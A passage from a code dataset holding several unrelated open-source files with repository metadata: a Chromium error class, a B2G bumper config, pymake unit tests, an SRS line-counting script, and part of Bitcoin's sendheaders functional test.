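            result[opt] = True
    return result
# _demo_optlist_to_dict("rw,relatime,data=writeback")
# -> {'rw': True, 'relatime': True, 'data': 'writeback'}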
|
wcmitchell/insights-core
|
insights/parsers/fstab.py
|
Python
|
apache-2.0
| 6,335 | 0.00221 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class BaseError(Exception):
"""Base error for all test runner errors."""
def __init__(self, message, is_infra_error=False):
super(BaseError, self).__init__(message)
self._is_infra_error = is_infra_error
self.message = message
def __eq__(self, other):
return (self.message == other.message
and self.is_infra_error == other.is_infra_error)
def __ne__(self, other):
return not self == other
@property
def is_infra_error(self):
"""Property to indicate if error was caused by an infrastructure issue."""
return self._is_infra_error
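# --- Illustrative usage sketch, not part of the original module ---------------
# Shows how a caller is expected to distinguish infrastructure failures from
# ordinary test failures.  The subclass and message below are hypothetical.
class _ExampleDeviceError(BaseError):
    pass

def _handle(err):
    # An infra error usually means the run should be retried, not failed.
    return 'retry' if err.is_infra_error else 'fail'

# _handle(_ExampleDeviceError('adb lost the device', is_infra_error=True)) -> 'retry'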
|
catapult-project/catapult
|
devil/devil/base_error.py
|
Python
|
bsd-3-clause
| 747 | 0.008032 |
#!/usr/bin/env python
config = {
"exes": {
# Get around the https warnings
"hg": ['/usr/local/bin/hg', "--config", "web.cacerts=/etc/pki/tls/certs/ca-bundle.crt"],
"hgtool.py": ["/usr/local/bin/hgtool.py"],
"gittool.py": ["/usr/local/bin/gittool.py"],
},
'gecko_pull_url': 'https://hg.mozilla.org/integration/b2g-inbound',
'gecko_push_url': 'ssh://hg.mozilla.org/integration/b2g-inbound',
'gecko_local_dir': 'b2g-inbound',
'manifests_repo': 'https://git.mozilla.org/b2g/b2g-manifest.git',
'manifests_revision': 'origin/master',
'hg_user': 'B2G Bumper Bot <release+b2gbumper@mozilla.com>',
"ssh_key": "~/.ssh/ffxbld_dsa",
"ssh_user": "ffxbld",
'hgtool_base_bundle_urls': ['https://ftp-ssl.mozilla.org/pub/mozilla.org/firefox/bundles'],
'gaia_repo_url': 'https://hg.mozilla.org/integration/gaia-central',
'gaia_revision_file': 'b2g/config/gaia.json',
'gaia_max_revisions': 5,
# Which git branch this hg repo corresponds to
'gaia_git_branch': 'master',
'gaia_mapper_project': 'gaia',
'mapper_url': 'http://cruncher.build.mozilla.org/mapper/{project}/{vcs}/{rev}',
'devices': {
'dolphin': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'emulator-kk': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'emulator-jb': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'emulator-ics': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
'manifest_file': 'emulator.xml',
},
# Equivalent to emulator-ics - see bug 916134
# Remove once the above bug resolved
'emulator': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
'manifest_file': 'emulator.xml',
},
'flame': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'flame-kk': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'hamachi': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'helix': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'nexus-4': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'wasabi': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
},
'repo_remote_mappings': {
'https://android.googlesource.com/': 'https://git.mozilla.org/external/aosp',
'git://codeaurora.org/': 'https://git.mozilla.org/external/caf',
'git://github.com/mozilla-b2g/': 'https://git.mozilla.org/b2g',
'git://github.com/mozilla/': 'https://git.mozilla.org/b2g',
'https://git.mozilla.org/releases': 'https://git.mozilla.org/releases',
'http://android.git.linaro.org/git-ro/': 'https://git.mozilla.org/external/linaro',
'http://sprdsource.spreadtrum.com:8085/b2g/android': 'https://git.mozilla.org/external/sprd-aosp',
'git://github.com/apitrace/': 'https://git.mozilla.org/external/apitrace',
'git://github.com/t2m-foxfone/': 'https://git.mozilla.org/external/t2m-foxfone',
# Some mappings to ourself, we want to leave these as-is!
'https://git.mozilla.org/external/aosp': 'https://git.mozilla.org/external/aosp',
'https://git.mozilla.org/external/caf': 'https://git.mozilla.org/external/caf',
'https://git.mozilla.org/b2g': 'https://git.mozilla.org/b2g',
'https://git.mozilla.org/external/apitrace': 'https://git.mozilla.org/external/apitrace',
'https://git.mozilla.org/external/t2m-foxfone': 'https://git.mozilla.org/external/t2m-foxfone',
},
}
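# --- Illustrative sketch, not part of the original config ---------------------
# How the mapper_url template above is presumably filled in by the bumper
# scripts; the vcs and rev values here are made up for demonstration.
_example_mapper_query = config['mapper_url'].format(
    project=config['gaia_mapper_project'],
    vcs='git',
    rev='abcdef0123456789',
)
# -> 'http://cruncher.build.mozilla.org/mapper/gaia/git/abcdef0123456789'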
|
kartikgupta0909/gittest
|
configs/b2g_bumper/master.py
|
Python
|
mpl-2.0
| 3,963 | 0.003028 |
import pymake.data, pymake.functions, pymake.util
import unittest
import re
def multitest(cls):
for name in cls.testdata.keys():
def m(self, name=name):
return self.runSingle(*self.testdata[name])
setattr(cls, 'test_%s' % name, m)
return cls
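# --- Illustrative sketch, not part of the original suite ----------------------
# multitest() expects the decorated class to define ``testdata`` as a dict and
# a runSingle() method; it then generates one test_<name> method per entry.
# The class below is hypothetical and exists only to demonstrate the decorator.
@multitest
class _MultitestExampleTest(unittest.TestCase):
    testdata = {
        'split_simple': ('foo bar', ['foo', 'bar']),
    }
    def runSingle(self, s, expected):
        self.assertEqual(s.split(), expected)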
class SplitWordsTest(unittest.TestCase):
testdata = (
(' test test.c test.o ', ['test', 'test.c', 'test.o']),
('\ttest\t test.c \ntest.o', ['test', 'test.c', 'test.o']),
)
def runTest(self):
for s, e in self.testdata:
w = s.split()
self.assertEqual(w, e, 'splitwords(%r)' % (s,))
class GetPatSubstTest(unittest.TestCase):
testdata = (
('%.c', '%.o', ' test test.c test.o ', 'test test.o test.o'),
('%', '%.o', ' test.c test.o ', 'test.c.o test.o.o'),
('foo', 'bar', 'test foo bar', 'test bar bar'),
('foo', '%bar', 'test foo bar', 'test %bar bar'),
('%', 'perc_%', 'path', 'perc_path'),
('\\%', 'sub%', 'p %', 'p sub%'),
('%.c', '\\%%.o', 'foo.c bar.o baz.cpp', '%foo.o bar.o baz.cpp'),
)
def runTest(self):
for s, r, d, e in self.testdata:
words = d.split()
p = pymake.data.Pattern(s)
a = ' '.join((p.subst(r, word, False)
for word in words))
self.assertEqual(a, e, 'Pattern(%r).subst(%r, %r)' % (s, r, d))
class LRUTest(unittest.TestCase):
# getkey, expected, funccount, debugitems
expected = (
(0, '', 1, (0,)),
(0, '', 2, (0,)),
(1, ' ', 3, (1, 0)),
(1, ' ', 3, (1, 0)),
(0, '', 4, (0, 1)),
(2, ' ', 5, (2, 0, 1)),
(1, ' ', 5, (1, 2, 0)),
(3, ' ', 6, (3, 1, 2)),
)
def spaceFunc(self, l):
self.funccount += 1
return ''.ljust(l)
def runTest(self):
self.funccount = 0
c = pymake.util.LRUCache(3, self.spaceFunc, lambda k, v: k % 2)
self.assertEqual(tuple(c.debugitems()), ())
for i in range(0, len(self.expected)):
k, e, fc, di = self.expected[i]
v = c.get(k)
self.assertEqual(v, e)
self.assertEqual(self.funccount, fc,
"funccount, iteration %i, got %i expected %i" % (i, self.funccount, fc))
goti = tuple(c.debugitems())
self.assertEqual(goti, di,
"debugitems, iteration %i, got %r expected %r" % (i, goti, di))
class EqualityTest(unittest.TestCase):
def test_string_expansion(self):
s1 = pymake.data.StringExpansion('foo bar', None)
s2 = pymake.data.StringExpansion('foo bar', None)
self.assertEqual(s1, s2)
def test_expansion_simple(self):
s1 = pymake.data.Expansion(None)
s2 = pymake.data.Expansion(None)
self.assertEqual(s1, s2)
s1.appendstr('foo')
s2.appendstr('foo')
self.assertEqual(s1, s2)
def test_expansion_string_finish(self):
"""Adjacent strings should normalize to same value."""
s1 = pymake.data.Expansion(None)
s2 = pymake.data.Expansion(None)
s1.appendstr('foo')
s2.appendstr('foo')
s1.appendstr(' bar')
s1.appendstr(' baz')
s2.appendstr(' bar baz')
self.assertEqual(s1, s2)
def test_function(self):
s1 = pymake.data.Expansion(None)
s2 = pymake.data.Expansion(None)
n1 = pymake.data.StringExpansion('FOO', None)
n2 = pymake.data.StringExpansion('FOO', None)
v1 = pymake.functions.VariableRef(None, n1)
v2 = pymake.functions.VariableRef(None, n2)
s1.appendfunc(v1)
s2.appendfunc(v2)
self.assertEqual(s1, s2)
class StringExpansionTest(unittest.TestCase):
def test_base_expansion_interface(self):
s1 = pymake.data.StringExpansion('FOO', None)
self.assertTrue(s1.is_static_string)
funcs = list(s1.functions())
self.assertEqual(len(funcs), 0)
funcs = list(s1.functions(True))
self.assertEqual(len(funcs), 0)
refs = list(s1.variable_references())
self.assertEqual(len(refs), 0)
class ExpansionTest(unittest.TestCase):
def test_is_static_string(self):
e1 = pymake.data.Expansion()
e1.appendstr('foo')
self.assertTrue(e1.is_static_string)
e1.appendstr('bar')
self.assertTrue(e1.is_static_string)
vname = pymake.data.StringExpansion('FOO', None)
func = pymake.functions.VariableRef(None, vname)
e1.appendfunc(func)
self.assertFalse(e1.is_static_string)
def test_get_functions(self):
e1 = pymake.data.Expansion()
e1.appendstr('foo')
vname1 = pymake.data.StringExpansion('FOO', None)
vname2 = pymake.data.StringExpansion('BAR', None)
func1 = pymake.functions.VariableRef(None, vname1)
func2 = pymake.functions.VariableRef(None, vname2)
e1.appendfunc(func1)
e1.appendfunc(func2)
funcs = list(e1.functions())
self.assertEqual(len(funcs), 2)
func3 = pymake.functions.SortFunction(None)
func3.append(vname1)
e1.appendfunc(func3)
funcs = list(e1.functions())
self.assertEqual(len(funcs), 3)
refs = list(e1.variable_references())
self.assertEqual(len(refs), 2)
def test_get_functions_descend(self):
e1 = pymake.data.Expansion()
vname1 = pymake.data.StringExpansion('FOO', None)
func1 = pymake.functions.VariableRef(None, vname1)
e2 = pymake.data.Expansion()
e2.appendfunc(func1)
func2 = pymake.functions.SortFunction(None)
func2.append(e2)
e1.appendfunc(func2)
funcs = list(e1.functions())
self.assertEqual(len(funcs), 1)
funcs = list(e1.functions(True))
self.assertEqual(len(funcs), 2)
self.assertTrue(isinstance(funcs[0], pymake.functions.SortFunction))
def test_is_filesystem_dependent(self):
e = pymake.data.Expansion()
vname1 = pymake.data.StringExpansion('FOO', None)
func1 = pymake.functions.VariableRef(None, vname1)
e.appendfunc(func1)
self.assertFalse(e.is_filesystem_dependent)
func2 = pymake.functions.WildcardFunction(None)
func2.append(vname1)
e.appendfunc(func2)
self.assertTrue(e.is_filesystem_dependent)
def test_is_filesystem_dependent_descend(self):
sort = pymake.functions.SortFunction(None)
wildcard = pymake.functions.WildcardFunction(None)
e = pymake.data.StringExpansion('foo/*', None)
wildcard.append(e)
e = pymake.data.Expansion(None)
e.appendfunc(wildcard)
sort.append(e)
e = pymake.data.Expansion(None)
e.appendfunc(sort)
self.assertTrue(e.is_filesystem_dependent)
if __name__ == '__main__':
unittest.main()
|
mozilla/pymake
|
tests/datatests.py
|
Python
|
mit
| 6,946 | 0.001152 |
#!/usr/bin/python
'''
The MIT License (MIT)
Copyright (c) 2013-2015 SRS(simple-rtmp-server)
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
#################################################################################
# count the lines of code and comments in a source file
#################################################################################
import sys
def trace(msg):
print msg
pass
def info(msg):
print msg
pass
def verbose(msg):
#print msg
pass
def process(f, code_file):
info("process file success")
(stat_code, stat_block_comments, stat_line_comments) = (0, 0, 0)
is_block_comments = False
is_line_comments = False
for line in f.readlines():
line = line.strip()
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
else:
verbose("[block][cont] %s"%line)
stat_block_comments += 1
continue
if line.startswith("/*"):
verbose("[block][start] %s"%line)
is_block_comments = True
is_line_comments = False
stat_block_comments += 1
# inline block comments
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
continue
if line.startswith("//"):
verbose("[line] %s"%line)
is_block_comments = False
is_line_comments = True
stat_line_comments += 1
continue
verbose("[code] %s"%line)
is_block_comments = False
is_line_comments = False
stat_code += 1
total = stat_code + stat_block_comments + stat_line_comments
comments = stat_block_comments + stat_line_comments
trace("total:%s code:%s comments:%s block:%s line:%s file:%s"%(total, stat_code, comments, stat_block_comments, stat_line_comments, code_file))
return (0, total, stat_code, comments, stat_block_comments, stat_line_comments, code_file)
def do_stat(code_file):
f = None
try:
f = open(code_file, "r")
        info("open file success")
return process(f, code_file)
finally:
if f is not None:
f.close()
info("close file success")
return (-1, 0, 0, 0, 0, 0, None)
code_file = None
if __name__ == "__main__":
if len(sys.argv) <= 1:
print "to stat the code and comments lines"
print "Usage: python %s <code_file>"%(sys.argv[0])
print " code_file: the code(header or source) file to stat"
print "Example:"
print " python %s src/core/srs_core.hpp"%(sys.argv[0])
sys.exit(-1)
code_file = sys.argv[1]
info("stat %s"%(code_file))
do_stat(code_file)
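# --- Illustrative sketch, not part of the original script ---------------------
# Aggregating the per-file tuples returned by do_stat() across several files;
# the field order matches the tuple built in process() above.
def stat_many(code_files):
    totals = {"total": 0, "code": 0, "comments": 0}
    for path in code_files:
        try:
            ret, total, code, comments, _blk, _ln, _name = do_stat(path)
        except IOError:
            continue
        if ret == 0:
            totals["total"] += total
            totals["code"] += code
            totals["comments"] += comments
    return totals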
|
drunknbass/srs
|
trunk/research/code-statistic/cs.py
|
Python
|
mit
| 3,920 | 0.006633 |
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test behavior of headers messages to announce blocks.
Setup:
- Two nodes:
- node0 is the node-under-test. We create two p2p connections to it. The
first p2p connection is a control and should only ever receive inv's. The
second p2p connection tests the headers sending logic.
- node1 is used to create reorgs.
test_null_locators
==================
Sends two getheaders requests with null locator values. The first request's
hashstop value refers to a validated block, while the second's refers to a
block which hasn't been validated. Verifies that only the first request returns
headers.
test_nonnull_locators
=====================
Part 1: No headers announcements before "sendheaders"
a. node mines a block [expect: inv]
send getdata for the block [expect: block]
b. node mines another block [expect: inv]
send getheaders and getdata [expect: headers, then block]
c. node mines another block [expect: inv]
peer mines a block, announces with header [expect: getdata]
d. node mines another block [expect: inv]
Part 2: After "sendheaders", headers announcements should generally work.
a. peer sends sendheaders [expect: no response]
peer sends getheaders with current tip [expect: no response]
b. node mines a block [expect: tip header]
c. for N in 1, ..., 10:
* for announce-type in {inv, header}
- peer mines N blocks, announces with announce-type
[ expect: getheaders/getdata or getdata, deliver block(s) ]
- node mines a block [ expect: 1 header ]
Part 3: Headers announcements stop after large reorg and resume after getheaders or inv from peer.
- For response-type in {inv, getheaders}
* node mines a 7 block reorg [ expect: headers announcement of 8 blocks ]
* node mines an 8-block reorg [ expect: inv at tip ]
* peer responds with getblocks/getdata [expect: inv, blocks ]
* node mines another block [ expect: inv at tip, peer sends getdata, expect: block ]
* node mines another block at tip [ expect: inv ]
* peer responds with getheaders with an old hashstop more than 8 blocks back [expect: headers]
* peer requests block [ expect: block ]
* node mines another block at tip [ expect: inv, peer sends getdata, expect: block ]
* peer sends response-type [expect headers if getheaders, getheaders/getdata if mining new block]
* node mines 1 block [expect: 1 header, peer responds with getdata]
Part 4: Test direct fetch behavior
a. Announce 2 old block headers.
Expect: no getdata requests.
b. Announce 3 new blocks via 1 headers message.
Expect: one getdata request for all 3 blocks.
(Send blocks.)
c. Announce 1 header that forks off the last two blocks.
Expect: no response.
d. Announce 1 more header that builds on that fork.
Expect: one getdata request for two blocks.
e. Announce 16 more headers that build on that fork.
Expect: getdata request for 14 more blocks.
f. Announce 1 more header that builds on that fork.
Expect: no response.
Part 5: Test handling of headers that don't connect.
a. Repeat 10 times:
1. Announce a header that doesn't connect.
Expect: getheaders message
2. Send headers chain.
Expect: getdata for the missing blocks, tip update.
b. Then send 9 more headers that don't connect.
Expect: getheaders message each time.
c. Announce a header that does connect.
Expect: no response.
d. Announce 49 headers that don't connect.
Expect: getheaders message each time.
e. Announce one more that doesn't connect.
Expect: disconnect.
"""
from test_framework.blocktools import create_block, create_coinbase
from test_framework.messages import CInv
from test_framework.mininode import (
CBlockHeader,
NODE_WITNESS,
P2PInterface,
mininode_lock,
msg_block,
msg_getblocks,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_sendheaders,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
sync_blocks,
wait_until,
)
DIRECT_FETCH_RESPONSE_TIME = 0.05
class BaseNode(P2PInterface):
def __init__(self):
super().__init__()
self.block_announced = False
self.last_blockhash_announced = None
self.recent_headers_announced = []
def send_get_data(self, block_hashes):
"""Request data for a list of block hashes."""
msg = msg_getdata()
for x in block_hashes:
msg.inv.append(CInv(2, x))
self.send_message(msg)
def send_get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.send_message(msg)
def send_block_inv(self, blockhash):
msg = msg_inv()
msg.inv = [CInv(2, blockhash)]
self.send_message(msg)
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
def send_getblocks(self, locator):
getblocks_message = msg_getblocks()
getblocks_message.locator.vHave = locator
self.send_message(getblocks_message)
def wait_for_getdata(self, hash_list, timeout=60):
if hash_list == []:
return
test_function = lambda: "getdata" in self.last_message and [x.hash for x in self.last_message["getdata"].inv] == hash_list
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block_announcement(self, block_hash, timeout=60):
test_function = lambda: self.last_blockhash_announced == block_hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def on_inv(self, message):
self.block_announced = True
self.last_blockhash_announced = message.inv[-1].hash
def on_headers(self, message):
if len(message.headers):
self.block_announced = True
for x in message.headers:
x.calc_sha256()
# append because headers may be announced over multiple messages.
self.recent_headers_announced.append(x.sha256)
self.last_blockhash_announced = message.headers[-1].sha256
def clear_block_announcements(self):
with mininode_lock:
self.block_announced = False
self.last_message.pop("inv", None)
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_headers_announcement(self, headers):
"""Test whether the last headers announcements received are right.
Headers may be announced across more than one message."""
test_function = lambda: (len(self.recent_headers_announced) >= len(headers))
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
assert_equal(self.recent_headers_announced, headers)
self.block_announced = False
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_inv_announcement(self, inv):
"""Test whether the last announcement received had the right inv.
inv should be a list of block hashes."""
test_function = lambda: self.block_announced
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
compare_inv = []
if "inv" in self.last_message:
compare_inv = [x.hash for x in self.last_message["inv"].inv]
assert_equal(compare_inv, inv)
self.block_announced = False
self.last_message.pop("inv", None)
class SendHeadersTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def mine_blocks(self, count):
"""Mine count blocks and return the new tip."""
# Clear out block announcements from each p2p listener
[x.clear_block_announcements() for x in self.nodes[0].p2ps]
self.nodes[0].generate(count)
return int(self.nodes[0].getbestblockhash(), 16)
def mine_reorg(self, length):
"""Mine a reorg that invalidates length blocks (replacing them with # length+1 blocks).
Note: we clear the state of our p2p connections after the
to-be-reorged-out blocks are mined, so that we don't break later tests.
return the list of block hashes newly mined."""
self.nodes[0].generate(length) # make sure all invalidated blocks are node0's
sync_blocks(self.nodes, wait=0.1)
for x in self.nodes[0].p2ps:
x.wait_for_block_announcement(int(self.nodes[0].getbestblockhash(), 16))
x.clear_block_announcements()
tip_height = self.nodes[1].getblockcount()
hash_to_invalidate = self.nodes[1].getblockhash(tip_height - (length - 1))
self.nodes[1].invalidateblock(hash_to_invalidate)
all_hashes = self.nodes[1].generate(length + 1) # Must be longer than the orig chain
sync_blocks(self.nodes, wait=0.1)
return [int(x, 16) for x in all_hashes]
def run_test(self):
# Setup the p2p connections
inv_node = self.nodes[0].add_p2p_connection(BaseNode())
# Make sure NODE_NETWORK is not set for test_node, so no block download
# will occur outside of direct fetching
test_node = self.nodes[0].add_p2p_connection(BaseNode(), services=NODE_WITNESS)
# Ensure verack's have been processed by our peer
inv_node.sync_with_ping()
test_node.sync_with_ping()
self.test_null_locators(test_node, inv_node)
self.test_nonnull_locators(test_node, inv_node)
def test_null_locators(self, test_node, inv_node):
tip = self.nodes[0].getblockheader(self.nodes[0].generate(1)[0])
tip_hash = int(tip["hash"], 16)
inv_node.check_last_inv_announcement(inv=[tip_hash])
test_node.check_last_inv_announcement(inv=[tip_hash])
self.log.info("Verify getheaders with null locator and valid hashstop returns headers.")
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=tip_hash)
test_node.check_last_headers_announcement(headers=[tip_hash])
self.log.info("Verify getheaders with null locator and invalid hashstop does not return headers.")
block = create_block(int(tip["hash"], 16), create_coinbase(tip["height"] + 1), tip["mediantime"] + 1)
block.solve()
test_node.send_header_for_blocks([block])
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=int(block.hash, 16))
test_node.sync_with_ping()
assert_equal(test_node.block_announced, False)
inv_node.clear_block_announcements()
test_node.send_message(msg_block(block))
inv_node.check_last_inv_announcement(inv=[int(block.hash, 16)])
def test_nonnull_locators(self, test_node, inv_node):
tip = int(self.nodes[0].getbestblockhash(), 16)
# PART 1
# 1. Mine a block; expect inv announcements each time
self.log.info("Part 1: headers don't start before sendheaders message...")
for i in range(4):
self.log.debug("Part 1.{}: starting...".format(i))
old_tip = tip
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
# Try a few different responses; none should affect next announcement
if i == 0:
# first request the block
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# next try requesting header and block
test_node.send_get_headers(locator=[old_tip], hashstop=tip)
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
test_node.clear_block_announcements() # since we requested headers...
elif i == 2:
# this time announce own block via headers
inv_node.clear_block_announcements()
height = self.nodes[0].getblockcount()
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
new_block = create_block(tip, create_coinbase(height + 1), block_time)
new_block.solve()
test_node.send_header_for_blocks([new_block])
test_node.wait_for_getdata([new_block.sha256])
test_node.send_message(msg_block(new_block))
test_node.sync_with_ping() # make sure this block is processed
wait_until(lambda: inv_node.block_announced, timeout=60, lock=mininode_lock)
inv_node.clear_block_announcements()
test_node.clear_block_announcements()
self.log.info("Part 1: success!")
self.log.info("Part 2: announce blocks with headers after sendheaders message...")
# PART 2
# 2. Send a sendheaders message and test that headers announcements
# commence and keep working.
test_node.send_message(msg_sendheaders())
prev_tip = int(self.nodes[0].getbestblockhash(), 16)
test_node.send_get_headers(locator=[prev_tip], hashstop=0)
test_node.sync_with_ping()
# Now that we've synced headers, headers announcements should work
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height = self.nodes[0].getblockcount() + 1
block_time += 10 # Advance far enough ahead
for i in range(10):
self.log.debug("Part 2.{}: starting...".format(i))
# Mine i blocks, and alternate announcing either via
# inv (of tip) or via headers. After each, new blocks
# mined by the node should successfully be announced
# with block header, even though the blocks are never requested
for j in range(2):
self.log.debug("Part 2.{}.{}: starting...".format(i, j))
blocks = []
for b in range(i + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
if j == 0:
# Announce via inv
test_node.send_block_inv(tip)
test_node.wait_for_getheaders()
# Should have received a getheaders now
test_node.send_header_for_blocks(blocks)
# Test that duplicate inv's won't result in duplicate
# getdata requests, or duplicate headers announcements
[inv_node.send_block_inv(x.sha256) for x in blocks]
test_node.wait_for_getdata([x.sha256 for x in blocks])
inv_node.sync_with_ping()
else:
# Announce via headers
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
# Test that duplicate headers won't result in duplicate
# getdata requests (the check is further down)
inv_node.send_header_for_blocks(blocks)
inv_node.sync_with_ping()
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
inv_node.sync_with_ping()
# This block should not be announced to the inv node (since it also
# broadcast it)
assert "inv" not in inv_node.last_message
assert "headers" not in inv_node.last_message
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height += 1
block_time += 1
self.log.info("Part 2: success!")
self.log.info("Part 3: headers announcements can stop after large reorg, and resume after headers/inv from peer...")
# PART 3. Headers announcements can stop after large reorg, and resume after
# getheaders or inv from peer.
for j in range(2):
self.log.debug("Part 3.{}: starting...".format(j))
# First try mining a reorg that can propagate with header announcement
new_block_hashes = self.mine_reorg(length=7)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=new_block_hashes)
block_time += 8
# Mine a too-large reorg, which should be announced with a single inv
new_block_hashes = self.mine_reorg(length=8)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
block_time += 9
            fork_point = self.nodes[0].getblock("%064x" % new_block_hashes[0])["previousblockhash"]
fork_point = int(fork_point, 16)
# Use getblocks/getdata
test_node.send_getblocks(locator=[fork_point])
test_node.check_last_inv_announcement(inv=new_block_hashes)
test_node.send_get_data(new_block_hashes)
test_node.wait_for_block(new_block_hashes[-1])
for i in range(3):
self.log.debug("Part 3.{}.{}: starting...".format(j, i))
# Mine another block, still should get only an inv
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
if i == 0:
# Just get the data -- shouldn't cause headers announcements to resume
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# Send a getheaders message that shouldn't trigger headers announcements
# to resume (best header sent will be too old)
test_node.send_get_headers(locator=[fork_point], hashstop=new_block_hashes[1])
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 2:
# This time, try sending either a getheaders to trigger resumption
# of headers announcements, or mine a new block and inv it, also
# triggering resumption of headers announcements.
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
if j == 0:
test_node.send_get_headers(locator=[tip], hashstop=0)
test_node.sync_with_ping()
else:
test_node.send_block_inv(tip)
test_node.sync_with_ping()
# New blocks should now be announced with header
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
self.log.info("Part 3: success!")
self.log.info("Part 4: Testing direct fetch behavior...")
tip = self.mine_blocks(1)
height = self.nodes[0].getblockcount() + 1
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
# Create 2 blocks. Send the blocks, then send the headers.
blocks = []
for b in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
inv_node.send_message(msg_block(blocks[-1]))
inv_node.sync_with_ping() # Make sure blocks are processed
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
# should not have received any getdata messages
with mininode_lock:
assert "getdata" not in test_node.last_message
# This time, direct fetch should work
blocks = []
for b in range(3):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=DIRECT_FETCH_RESPONSE_TIME)
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
# Now announce a header that forks the last two blocks
tip = blocks[0].sha256
height -= 1
blocks = []
# Create extra blocks for later
for b in range(20):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Announcing one block on fork should not trigger direct fetch
# (less work than tip)
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[0:1])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
# Announcing one more block on fork should trigger direct fetch for
# both blocks (same work as tip)
test_node.send_header_for_blocks(blocks[1:2])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[0:2]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 16 more headers should trigger direct fetch for 14 more
# blocks
